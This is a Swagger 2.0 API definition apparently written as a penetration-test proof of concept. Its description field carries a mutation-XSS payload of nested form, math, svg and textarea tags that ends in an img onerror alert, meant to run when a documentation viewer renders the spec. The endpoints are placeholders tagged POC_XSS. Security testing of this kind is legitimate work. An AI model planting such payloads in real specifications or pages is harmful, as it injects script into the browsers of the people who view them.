swagger: '2.0'
info:
  title: Prueba de Concepto - Cross-Site Scripting
  description: |
       <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert('XSS') src=1>"></form>
version: Pentest
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /MetodoMalicioso:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - POC_XSS
      operationId: findAccounts
      summary: Prueba de concepto XSS
  /AutorizacionesV1:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - AutorizacionesV1
      operationId: findAccounts
      summary: Finds all accounts
